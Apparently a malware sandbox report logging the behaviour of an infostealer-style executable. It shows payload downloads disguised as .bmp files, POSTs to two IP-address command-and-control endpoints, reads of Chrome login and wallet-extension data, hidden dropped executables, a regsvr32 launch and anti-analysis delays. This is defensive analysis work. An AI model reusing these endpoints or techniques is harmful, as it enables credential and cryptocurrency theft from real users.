request	GET https://sun6-21.userapi.com/c235131/u17799268/docs/d34/0d08248537eb/d3232adg.bmp?extra=MXfyziyjTKDf6ofOrhDCTKpsWkbv10mkMTRRhYIV8JRe3R-EQTQ053o3girAdfhhnn5fc1YH_S_WsBSzGbqRuEfy-bz_PCHnGFFm2ELe6Vs13UB3lsTOyfn7GTx222_mFRvKUYaEAkS6mnss
request	GET https://vk.com/doc44017378_669202180?hash=Qj8GmTTzSwexN5MiDhkzSBdsEuAfR50DxI5PmBbRzn8&dl=G49L5cNOoCw8qI3zZagSCyprvu5ngf5V9jZb6GDfmT8&api=1&no_preview=1#redcl
request	GET https://sun6-20.userapi.com/c237031/u44017378/docs/d47/f53dd4d29da4/red.bmp?extra=aPmcskdA3y2ObuY7QHUX6sPMjQu36B4newP0bAW-Ly73hW3EW_bozidYJAqh73X7SUvR1gIX9uc9Cb4NNw95t2w09-_aicB8V3k2Xih1EYLcm7JY06Dr2jP135rFTycmXICkUKS8rcX-rNt7
request	GET https://vk.com/doc17799268_667356691?hash=cUASNycPr9e7ejTeXRHP4JzU43t6UAQvFbVpJRIyYfL&dl=WIcfE7rh128yHk3HTd3LfM84KN7pulppjnAcRmZGByH&api=1&no_preview=1#orig
request	GET https://sun6-23.userapi.com/c909218/u17799268/docs/d51/a01868bc6519/OriginalBuild.bmp?extra=ubUUt1995rM2O1vMl6qK3XtVBz9_ydnjOUtvK8odosQtYQIMBBSkvaNNKqqilClao3gbzVteXVX9L9OFNSV06NdFFhqmBwxMRWCeFMALiLTI8W6Vx3d4vHYiIZ6fNIjaj-fFlB6HwOA5YYkC
request	GET https://vk.com/doc17799268_667370292?hash=3zgmNBZUEabUAWsj0zIdTPreX2uOk9XZqB04AKml9Wc&dl=3EXwtWCuOk8m89Hgrb6xTH69yK7gn8gGsiaT4sE12Ls&api=1&no_preview=1#review
request	GET https://psv4.userapi.com/c909228/u17799268/docs/d27/d584128e4c13/setup.bmp?extra=QZMNAMmYW-qEHWSBh6dZ9jyKy_PY0fq3EfQW125lr8gOTPQKKk8D6XHsyvSTOD3T7PxspO6gsaXVUJbHjY4x2FlKcs3MgJmS9q6rOCgsMt-fKwYArNbdvgjxPZr2zE35GnV0uOAIllJpHWOQ

Sends data using the HTTP POST Method (2 events)

request	POST http://193.42.32.118/api/firegate.php
request	POST http://45.15.156.229/api/firegate.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1958 events)

Time & API	Arguments	Return
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077711810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077712810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077713810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077714810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077715810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077716810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077717810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077718810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077719810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007771a810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007771b810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007771c810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007771d810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007771e810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007771f810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077720810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077721810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077722810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077723810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077724810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077725810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077726810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077727810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077728810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077729810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007772a810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007772b810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007772c810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007772d810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007772e810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007772f810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077730810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077731810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077732810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077733810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077734810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077735810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077736810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077737810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077738810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077739810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007773a810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007773b810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007773c810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007773d810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007773e810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007773f810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077740810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077741810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800
NtAllocateVirtualMemory Sept. 14, 2023, 7:14 p.m.	process_identifier: 1460 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077742810 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	-1073741800

A process attempted to delay the analysis task. (1 event)

description

WWW14_64.exe tried to sleep 193 seconds, actually delayed analysis time by 193 seconds

Steals private information from local Internet browsers (14 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmblappgoiilbgafhjklehhfifbdocee
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn

Foreign language identified in PE resource (7 events)

name

RT_ICON

language

LANG_JAPANESE

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00f1d368

size

0x00000468

name

RT_ICON

language

LANG_JAPANESE

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00f1d368

size

0x00000468

name

RT_ICON

language

LANG_JAPANESE

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00f1d368

size

0x00000468

name

RT_ICON

language

LANG_JAPANESE

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00f1d368

size

0x00000468

name

RT_ICON

language

LANG_JAPANESE

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00f1d368

size

0x00000468

name

RT_ICON

language

LANG_JAPANESE

filetype

GLS_BINARY_LSB_FIRST

sublanguage

SUBLANG_DEFAULT

offset

0x00f1d368

size

0x00000468

name

RT_GROUP_ICON

language

LANG_JAPANESE

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x00f1d7d0

size

0x0000005a

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (14 events)

file	C:\Users\test22\Pictures\Minor Policy\z0cXWJOzi1YW10CuQRQjMRie.exe
file	C:\Users\test22\Pictures\Minor Policy\Qsk2lEb1POrkiATkW1TvHjJx.exe
file	C:\Users\test22\Pictures\Minor Policy\o2mnUNqs4hnoxF2fH15yb1Si.exe
file	C:\Users\test22\Pictures\Minor Policy\nbHH0jE8qZJ4tNguvouaT8ug.exe
file	C:\Users\test22\Pictures\Minor Policy\0Sg4p2isyE32UOnHiUlFNypw.exe
file	C:\Users\test22\Pictures\Minor Policy\9gJPiBlAGORHTZJCQ72APR4K.exe
file	C:\Users\test22\Pictures\Minor Policy\jO0KmIb4n4ZjS9AOGznw9fMl.exe
file	C:\Users\test22\Pictures\Minor Policy\4UQYE4n3ZYac371Rz_QX1L7n.exe
file	C:\Users\test22\Pictures\Minor Policy\OBFJzEOXCKuSMiLDIstThHOE.exe
file	C:\Users\test22\Pictures\Minor Policy\ldEQBC8aeCgL1Jw4jA1tloQg.exe
file	C:\Users\test22\Pictures\Minor Policy\cikl6UFkXU4cZQ6sFNhet5qr.exe
file	C:\Users\test22\Pictures\Minor Policy\LCfgNNO96dWppNu7PMj50Yzc.exe
file	C:\Users\test22\Pictures\Minor Policy\rRBwy4sa0uuFBL7ETAy2ubW2.exe
file	C:\Users\test22\Pictures\Minor Policy\ZcWmEJj67YVTAJcMEmzlUq_H.exe

Creates hidden or system file (2 events)

Time & API	Arguments	Status	Return	Repeated
SetFileAttributesW Sept. 14, 2023, 7:14 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Windows\System32\GroupPolicy filepath: C:\Windows\System32\GroupPolicy	1	1	0
SetFileAttributesW Sept. 14, 2023, 7:16 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Windows\System32\GroupPolicy filepath: C:\Windows\System32\GroupPolicy	1	1	0

Creates a suspicious process (2 events)

cmdline	regsvr32 -s F652w.85
cmdline	"C:\Windows\System32\regsvr32.exe" -s F652w.85

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\F652w.85

A process created a hidden window (8 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 14, 2023, 7:15 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\nbHH0jE8qZJ4tNguvouaT8ug.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\nbHH0jE8qZJ4tNguvouaT8ug.exe	1	1
ShellExecuteExW Sept. 14, 2023, 7:15 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\LCfgNNO96dWppNu7PMj50Yzc.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\LCfgNNO96dWppNu7PMj50Yzc.exe	1	1
ShellExecuteExW Sept. 14, 2023, 7:16 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\cikl6UFkXU4cZQ6sFNhet5qr.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\cikl6UFkXU4cZQ6sFNhet5qr.exe	1	1
ShellExecuteExW Sept. 14, 2023, 7:16 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\jO0KmIb4n4ZjS9AOGznw9fMl.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\jO0KmIb4n4ZjS9AOGznw9fMl.exe	1	1
ShellExecuteExW Sept. 14, 2023, 7:16 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\ldEQBC8aeCgL1Jw4jA1tloQg.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\ldEQBC8aeCgL1Jw4jA1tloQg.exe	1	1
ShellExecuteExW Sept. 14, 2023, 7:16 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\z0cXWJOzi1YW10CuQRQjMRie.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\z0cXWJOzi1YW10CuQRQjMRie.exe	1	1
ShellExecuteExW Sept. 14, 2023, 7:16 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\0Sg4p2isyE32UOnHiUlFNypw.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\0Sg4p2isyE32UOnHiUlFNypw.exe	1	1
ShellExecuteExW Sept. 14, 2023, 7:16 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures//Minor Policy\ZcWmEJj67YVTAJcMEmzlUq_H.exe parameters: filepath: C:\Users\test22\Pictures\Minor Policy\ZcWmEJj67YVTAJcMEmzlUq_H.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (50 events)

Time & API	Arguments	Status	Return
Process32FirstW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: [System Process] process_identifier: 0	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: System process_identifier: 4	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: smss.exe process_identifier: 232	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: csrss.exe process_identifier: 308	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: wininit.exe process_identifier: 344	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: csrss.exe process_identifier: 356	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: winlogon.exe process_identifier: 392	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: services.exe process_identifier: 436	1	1
Process32NextW Sept. 14, 2023, 7:14 p.m.	snapshot_handle: 0x00000000000003b0 process_name: lsass.exe process_identifier: 452	1	1
